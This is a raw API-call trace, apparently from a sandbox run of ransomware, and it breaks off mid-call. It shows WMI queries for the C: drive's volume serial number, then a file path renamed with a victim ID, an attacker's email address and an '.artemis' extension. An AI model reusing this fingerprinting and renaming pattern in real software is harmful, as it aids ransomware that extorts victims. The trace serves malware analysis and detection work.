0x0 [0146.785] WbemDefPath:IUnknown:AddRef (This=0x67385b0) returned 0x3 [0146.785] WbemDefPath:IUnknown:Release (This=0x67385b0) returned 0x2 [0146.785] WbemDefPath:IWbemPath:SetText (This=0x67385b0, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0146.785] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67385b0, puCount=0x6e4eddc | out: puCount=0x6e4eddc*=0x0) returned 0x0 [0146.785] WbemDefPath:IWbemPath:GetText (in: This=0x67385b0, lFlags=2, puBuffLength=0x6e4edd8*=0x0, pszText=0x0 | out: puBuffLength=0x6e4edd8*=0x20, pszText=0x0) returned 0x0 [0146.785] WbemDefPath:IWbemPath:GetText (in: This=0x67385b0, lFlags=2, puBuffLength=0x6e4edd8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6e4edd8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0146.785] WbemDefPath:IWbemPath:GetInfo (in: This=0x67385b0, uRequestedInfo=0x0, puResponse=0x6e4ede4 | out: puResponse=0x6e4ede4*=0xc19) returned 0x0 [0146.785] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67385b0, puCount=0x6e4eddc | out: puCount=0x6e4eddc*=0x0) returned 0x0 [0146.785] WbemDefPath:IWbemPath:GetInfo (in: This=0x67385b0, uRequestedInfo=0x0, puResponse=0x6e4ede4 | out: puResponse=0x6e4ede4*=0xc19) returned 0x0 [0146.785] WbemDefPath:IWbemPath:GetInfo (in: This=0x67385b0, uRequestedInfo=0x0, puResponse=0x6e4ede4 | out: puResponse=0x6e4ede4*=0xc19) returned 0x0 [0146.785] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67385b0, puCount=0x6e4ed5c | out: puCount=0x6e4ed5c*=0x0) returned 0x0 [0146.785] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67209c0, puCount=0x6e4ed48 | out: puCount=0x6e4ed48*=0x2) returned 0x0 [0146.785] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x6e4ed44*=0x0, pszText=0x0 | out: puBuffLength=0x6e4ed44*=0xf, pszText=0x0) returned 0x0 [0146.786] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x6e4ed44*=0xf, pszText="00000000000000" | out: puBuffLength=0x6e4ed44*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0146.786] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6e4ecf8 | out: ppv=0x6e4ecf8*=0x72015c) returned 0x0 [0146.786] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x6e4ecf0 | out: pAptType=0x6e4ecf0*=1) returned 0x0 [0146.786] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6e4ecf4 | out: ppvObject=0x6e4ecf4*=0x0) returned 0x80004002 [0146.786] IUnknown:Release (This=0x72015c) returned 0x1 [0146.787] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6e4e660 | out: ppv=0x6e4e660*=0x6736f08) returned 0x0 [0146.787] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736f08, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6e4e878 | out: ppvObject=0x6e4e878*=0x0) returned 0x80004002 [0146.787] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736f08, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6e4e88c | out: ppvObject=0x6e4e88c*=0x6738620) returned 0x0 [0146.787] WbemDefPath:IUnknown:Release (This=0x6736f08) returned 0x0 [0146.787] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738620, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6e4e4ac | out: ppvObject=0x6e4e4ac*=0x6738620) returned 0x0 [0146.787] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738620, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6e4e468 | out: ppvObject=0x6e4e468*=0x0) returned 0x80004002 [0146.787] WbemDefPath:IUnknown:AddRef (This=0x6738620) returned 0x3 [0146.787] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738620, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6e4ddc4 | out: ppvObject=0x6e4ddc4*=0x0) returned 0x80004002 [0146.787] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738620, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6e4dd74 | out: ppvObject=0x6e4dd74*=0x0) returned 0x80004002 [0146.788] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738620, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6e4dd80 | out: ppvObject=0x6e4dd80*=0x77dcb8) returned 0x0 [0146.788] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77dcb8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6e4dd88 | out: pCid=0x6e4dd88*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0146.788] WbemDefPath:IUnknown:Release (This=0x77dcb8) returned 0x3 [0146.788] CoGetContextToken (in: pToken=0x6e4dde0 | out: pToken=0x6e4dde0) returned 0x0 [0146.788] CoGetContextToken (in: pToken=0x6e4e1e8 | out: pToken=0x6e4e1e8) returned 0x0 [0146.788] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738620, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6e4e278 | out: ppvObject=0x6e4e278*=0x0) returned 0x80004002 [0146.788] WbemDefPath:IUnknown:Release (This=0x6738620) returned 0x2 [0146.788] WbemDefPath:IUnknown:Release (This=0x6738620) returned 0x1 [0146.788] CoGetContextToken (in: pToken=0x6e4eb70 | out: pToken=0x6e4eb70) returned 0x0 [0146.788] CoGetContextToken (in: pToken=0x6e4ead0 | out: pToken=0x6e4ead0) returned 0x0 [0146.788] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738620, riid=0x6e4eba0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6e4eb9c | out: ppvObject=0x6e4eb9c*=0x6738620) returned 0x0 [0146.788] WbemDefPath:IUnknown:AddRef (This=0x6738620) returned 0x3 [0146.788] WbemDefPath:IUnknown:Release (This=0x6738620) returned 0x2 [0146.788] WbemDefPath:IWbemPath:SetText (This=0x6738620, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0146.788] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738620, puCount=0x6e4ed20 | out: puCount=0x6e4ed20*=0x2) returned 0x0 [0146.788] WbemDefPath:IWbemPath:GetText (in: This=0x6738620, lFlags=4, puBuffLength=0x6e4ed1c*=0x0, pszText=0x0 | out: puBuffLength=0x6e4ed1c*=0xf, pszText=0x0) returned 0x0 [0146.788] WbemDefPath:IWbemPath:GetText (in: This=0x6738620, lFlags=4, puBuffLength=0x6e4ed1c*=0xf, pszText="00000000000000" | out: puBuffLength=0x6e4ed1c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0146.788] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6e4ed20 | out: ppv=0x6e4ed20*=0x72015c) returned 0x0 [0146.789] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x6e4ed18 | out: pAptType=0x6e4ed18*=1) returned 0x0 [0146.789] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6e4ed1c | out: ppvObject=0x6e4ed1c*=0x0) returned 0x80004002 [0146.789] IUnknown:Release (This=0x72015c) returned 0x1 [0146.789] CoGetClassObject (in: rclsid=0x7588d4*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6e4e940 | out: ppv=0x6e4e940*=0x672f520) returned 0x0 [0146.789] WbemLocator:IUnknown:QueryInterface (in: This=0x672f520, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6e4eb58 | out: ppvObject=0x6e4eb58*=0x0) returned 0x80004002 [0146.789] WbemLocator:IClassFactory:CreateInstance (in: This=0x672f520, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6e4eb6c | out: ppvObject=0x6e4eb6c*=0x6736ec8) returned 0x0 [0146.790] WbemLocator:IUnknown:Release (This=0x672f520) returned 0x0 [0146.790] WbemLocator:IUnknown:QueryInterface (in: This=0x6736ec8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6e4e78c | out: ppvObject=0x6e4e78c*=0x6736ec8) returned 0x0 [0146.790] WbemLocator:IUnknown:QueryInterface (in: This=0x6736ec8, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6e4e748 | out: ppvObject=0x6e4e748*=0x0) returned 0x80004002 [0146.790] WbemLocator:IUnknown:AddRef (This=0x6736ec8) returned 0x3 [0146.790] WbemLocator:IUnknown:QueryInterface (in: This=0x6736ec8, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6e4e0a4 | out: ppvObject=0x6e4e0a4*=0x0) returned 0x80004002 [0146.790] WbemLocator:IUnknown:QueryInterface (in: This=0x6736ec8, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6e4e054 | out: ppvObject=0x6e4e054*=0x0) returned 0x80004002 [0146.790] WbemLocator:IUnknown:QueryInterface (in: This=0x6736ec8, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6e4e060 | out: ppvObject=0x6e4e060*=0x0) returned 0x80004002 [0146.790] CoGetContextToken (in: pToken=0x6e4e0c0 | out: pToken=0x6e4e0c0) returned 0x0 [0146.790] CoGetContextToken (in: pToken=0x6e4e4c8 | out: pToken=0x6e4e4c8) returned 0x0 [0146.790] WbemLocator:IUnknown:QueryInterface (in: This=0x6736ec8, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6e4e558 | out: ppvObject=0x6e4e558*=0x0) returned 0x80004002 [0146.790] WbemLocator:IUnknown:Release (This=0x6736ec8) returned 0x2 [0146.790] WbemLocator:IUnknown:Release (This=0x6736ec8) returned 0x1 [0146.790] CoGetContextToken (in: pToken=0x6e4eb38 | out: pToken=0x6e4eb38) returned 0x0 [0146.790] CoGetContextToken (in: pToken=0x6e4ea98 | out: pToken=0x6e4ea98) returned 0x0 [0146.790] WbemLocator:IUnknown:QueryInterface (in: This=0x6736ec8, riid=0x6e4eb68*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6e4eb64 | out: ppvObject=0x6e4eb64*=0x6736ec8) returned 0x0 [0146.790] WbemLocator:IUnknown:AddRef (This=0x6736ec8) returned 0x3 [0146.790] WbemLocator:IUnknown:Release (This=0x6736ec8) returned 0x2 [0146.790] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738620, puCount=0x6e4ecfc | out: puCount=0x6e4ecfc*=0x2) returned 0x0 [0146.791] WbemDefPath:IWbemPath:GetText (in: This=0x6738620, lFlags=8, puBuffLength=0x6e4ecf8*=0x0, pszText=0x0 | out: puBuffLength=0x6e4ecf8*=0xf, pszText=0x0) returned 0x0 [0146.791] WbemDefPath:IWbemPath:GetText (in: This=0x6738620, lFlags=8, puBuffLength=0x6e4ecf8*=0xf, pszText="00000000000000" | out: puBuffLength=0x6e4ecf8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0146.791] CoCreateInstance (in: rclsid=0x745f1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x745f12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x6e4ebd4 | out: ppv=0x6e4ebd4*=0x6736eb8) returned 0x0 [0146.791] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6736eb8, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x6e4ec68 | out: ppNamespace=0x6e4ec68*=0x672cc94) returned 0x0 [0148.345] WbemLocator:IUnknown:QueryInterface (in: This=0x672cc94, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6e4eb04 | out: ppvObject=0x6e4eb04*=0x780be4) returned 0x0 [0148.345] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x780be4, pProxy=0x672cc94, pAuthnSvc=0x6e4eb54, pAuthzSvc=0x6e4eb50, pServerPrincName=0x6e4eb48, pAuthnLevel=0x6e4eb4c, pImpLevel=0x6e4eb3c, pAuthInfo=0x6e4eb40, pCapabilites=0x6e4eb44 | out: pAuthnSvc=0x6e4eb54*=0xa, pAuthzSvc=0x6e4eb50*=0x0, pServerPrincName=0x6e4eb48, pAuthnLevel=0x6e4eb4c*=0x6, pImpLevel=0x6e4eb3c*=0x2, pAuthInfo=0x6e4eb40, pCapabilites=0x6e4eb44*=0x1) returned 0x0 [0148.345] WbemLocator:IUnknown:Release (This=0x780be4) returned 0x1 [0148.345] WbemLocator:IUnknown:QueryInterface (in: This=0x672cc94, riid=0x745f10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6e4eaf8 | out: ppvObject=0x6e4eaf8*=0x780c04) returned 0x0 [0148.345] WbemLocator:IUnknown:QueryInterface (in: This=0x672cc94, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6e4eaf4 | out: ppvObject=0x6e4eaf4*=0x780be4) returned 0x0 [0148.345] WbemLocator:IClientSecurity:SetBlanket (This=0x780be4, pProxy=0x672cc94, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0148.346] WbemLocator:IUnknown:Release (This=0x780be4) returned 0x2 [0148.346] WbemLocator:IUnknown:Release (This=0x780c04) returned 0x1 [0148.346] CoTaskMemFree (pv=0x77e0b8) [0148.346] WbemLocator:IUnknown:Release (This=0x6736eb8) returned 0x0 [0148.346] WbemLocator:IUnknown:QueryInterface (in: This=0x672cc94, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6e4e6f4 | out: ppvObject=0x6e4e6f4*=0x780c04) returned 0x0 [0148.346] WbemLocator:IUnknown:QueryInterface (in: This=0x780c04, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6e4e6b0 | out: ppvObject=0x6e4e6b0*=0x0) returned 0x80004002 [0148.347] WbemLocator:IUnknown:QueryInterface (in: This=0x780c04, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6e4e4cc | out: ppvObject=0x6e4e4cc*=0x0) returned 0x80004002 [0148.347] WbemLocator:IUnknown:AddRef (This=0x780c04) returned 0x3 [0148.347] WbemLocator:IUnknown:QueryInterface (in: This=0x780c04, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6e4e00c | out: ppvObject=0x6e4e00c*=0x0) returned 0x80004002 [0148.348] WbemLocator:IUnknown:QueryInterface (in: This=0x780c04, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6e4dfbc | out: ppvObject=0x6e4dfbc*=0x0) returned 0x80004002 [0148.348] WbemLocator:IUnknown:QueryInterface (in: This=0x780c04, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6e4dfc8 | out: ppvObject=0x6e4dfc8*=0x780b64) returned 0x0 [0148.348] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x780b64, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6e4dfd0 | out: pCid=0x6e4dfd0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0148.348] WbemLocator:IUnknown:Release (This=0x780b64) returned 0x3 [0148.348] CoGetContextToken (in: pToken=0x6e4e028 | out: pToken=0x6e4e028) returned 0x0 [0148.349] CoGetContextToken (in: pToken=0x6e4e430 | out: pToken=0x6e4e430) returned 0x0 [0148.349] WbemLocator:IUnknown:QueryInterface (in: This=0x780c04, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6e4e4c0 | out: ppvObject=0x6e4e4c0*=0x780bec) returned 0x0 [0148.349] WbemLocator:IRpcOptions:Query (in: This=0x780bec, pPrx=0x780c04, dwProperty=2, pdwValue=0x6e4e4e8 | out: pdwValue=0x6e4e4e8) returned 0x80004002 [0148.349] WbemLocator:IUnknown:Release (This=0x780bec) returned 0x3 [0148.349] WbemLocator:IUnknown:Release (This=0x780c04) returned 0x2 [0148.349] CoGetContextToken (in: pToken=0x6e4ea08 | out: pToken=0x6e4ea08) returned 0x0 [0148.349] CoGetContextToken (in: pToken=0x6e4e968 | out: pToken=0x6e4e968) returned 0x0 [0148.349] WbemLocator:IUnknown:QueryInterface (in: This=0x780c04, riid=0x6e4ea38*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x6e4ea34 | out: ppvObject=0x6e4ea34*=0x672cc94) returned 0x0 [0148.349] WbemLocator:IUnknown:AddRef (This=0x672cc94) returned 0x4 [0148.349] WbemLocator:IUnknown:Release (This=0x672cc94) returned 0x3 [0148.349] WbemLocator:IUnknown:Release (This=0x672cc94) returned 0x2 [0148.349] SysStringLen (param_1=0x0) returned 0x0 [0148.349] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67385b0, puCount=0x6e4edcc | out: puCount=0x6e4edcc*=0x0) returned 0x0 [0148.349] WbemDefPath:IWbemPath:GetText (in: This=0x67385b0, lFlags=2, puBuffLength=0x6e4edc8*=0x0, pszText=0x0 | out: puBuffLength=0x6e4edc8*=0x20, pszText=0x0) returned 0x0 [0148.349] WbemDefPath:IWbemPath:GetText (in: This=0x67385b0, lFlags=2, puBuffLength=0x6e4edc8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6e4edc8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0148.350] CoGetContextToken (in: pToken=0x6e4ea38 | out: pToken=0x6e4ea38) returned 0x0 [0148.350] WbemLocator:IUnknown:AddRef (This=0x780c04) returned 0x3 [0148.350] WbemLocator:IUnknown:QueryInterface (in: This=0x780c04, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6e4e8cc | out: ppvObject=0x6e4e8cc*=0x780c04) returned 0x0 [0148.350] WbemLocator:IUnknown:Release (This=0x780c04) returned 0x3 [0148.350] WbemLocator:IUnknown:Release (This=0x780c04) returned 0x2 [0148.350] WbemDefPath:IWbemPath:GetText (in: This=0x67385b0, lFlags=2, puBuffLength=0x6e4edd0*=0x0, pszText=0x0 | out: puBuffLength=0x6e4edd0*=0x20, pszText=0x0) returned 0x0 [0148.350] WbemDefPath:IWbemPath:GetText (in: This=0x67385b0, lFlags=2, puBuffLength=0x6e4edd0*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6e4edd0*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0148.350] IWbemServices:GetObject (in: This=0x672cc94, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x6e4ed84*=0x0, ppCallResult=0x0 | out: ppObject=0x6e4ed84*=0x673b138, ppCallResult=0x0) returned 0x0 [0148.553] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738620, puCount=0x6e4ed84 | out: puCount=0x6e4ed84*=0x2) returned 0x0 [0148.553] WbemDefPath:IWbemPath:GetText (in: This=0x6738620, lFlags=4, puBuffLength=0x6e4ed80*=0x0, pszText=0x0 | out: puBuffLength=0x6e4ed80*=0xf, pszText=0x0) returned 0x0 [0148.553] WbemDefPath:IWbemPath:GetText (in: This=0x6738620, lFlags=4, puBuffLength=0x6e4ed80*=0xf, pszText="00000000000000" | out: puBuffLength=0x6e4ed80*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0148.553] IWbemClassObject:Get (in: This=0x673b138, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6e4ed80*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3519af4*=0, plFlavor=0x3519af8*=0 | out: pVal=0x6e4ed80*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3519af4*=8, plFlavor=0x3519af8*=0) returned 0x0 [0148.553] SysStringByteLen (bstr="9C354B42") returned 0x10 [0148.553] SysStringByteLen (bstr="9C354B42") returned 0x10 [0148.553] IWbemClassObject:Get (in: This=0x673b138, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6e4ed88*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3519af4*=8, plFlavor=0x3519af8*=0 | out: pVal=0x6e4ed88*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3519af4*=8, plFlavor=0x3519af8*=0) returned 0x0 [0148.553] SysStringByteLen (bstr="9C354B42") returned 0x10 [0148.553] SysStringByteLen (bstr="9C354B42") returned 0x10 [0148.553] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata", nBufferLength=0x105, lpBuffer=0x6e4e988, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata", lpFilePart=0x0) returned 0x49 [0148.553] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata.id-9C354B42.[khalate@tutanota.com].artemis", nBufferLength=0x105, lpBuffer=0x6e4e988, lpFilePart=0x0 | out: 